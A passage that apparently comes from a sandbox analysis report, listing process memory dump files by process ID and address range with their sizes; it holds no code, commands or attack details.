                                                                                                                                                                                                                        • memory/4152-400-0x0000000000BA0000-0x000000000104C000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4.7MB

                                                                                                                                                                                                                        • memory/4336-626-0x0000000004600000-0x0000000004954000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          3.3MB

                                                                                                                                                                                                                        • memory/4376-367-0x0000000007C20000-0x0000000007C70000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          320KB

                                                                                                                                                                                                                        • memory/4376-292-0x0000000006360000-0x0000000006372000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          72KB

                                                                                                                                                                                                                        • memory/4376-287-0x00000000068D0000-0x0000000006EE8000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          6.1MB

                                                                                                                                                                                                                        • memory/4376-290-0x0000000006420000-0x000000000652A000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          1.0MB

                                                                                                                                                                                                                        • memory/4376-219-0x00000000002F0000-0x0000000000342000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          328KB

                                                                                                                                                                                                                        • memory/4376-293-0x00000000063C0000-0x00000000063FC000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          240KB

                                                                                                                                                                                                                        • memory/4376-221-0x0000000004C70000-0x0000000004D02000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          584KB

                                                                                                                                                                                                                        • memory/4376-220-0x0000000005180000-0x0000000005724000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          5.6MB

                                                                                                                                                                                                                        • memory/4376-297-0x0000000006530000-0x000000000657C000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          304KB

                                                                                                                                                                                                                        • memory/4376-280-0x0000000006050000-0x000000000606E000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          120KB

                                                                                                                                                                                                                        • memory/4376-256-0x00000000058B0000-0x0000000005926000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          472KB

                                                                                                                                                                                                                        • memory/4376-238-0x0000000004C20000-0x0000000004C2A000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          40KB

                                                                                                                                                                                                                        • memory/4496-498-0x0000000000400000-0x0000000001F8C000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          27.5MB

                                                                                                                                                                                                                        • memory/4560-356-0x0000000002530000-0x0000000002531000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          4KB

                                                                                                                                                                                                                        • memory/4824-311-0x0000000000400000-0x0000000000455000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          340KB

                                                                                                                                                                                                                        • memory/4824-313-0x0000000000400000-0x0000000000455000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          340KB

                                                                                                                                                                                                                        • memory/4916-606-0x0000000010000000-0x00000000105DF000-memory.dmp
                                                                                                                                                                                                                          Filesize

                                                                                                                                                                                                                          5.9MB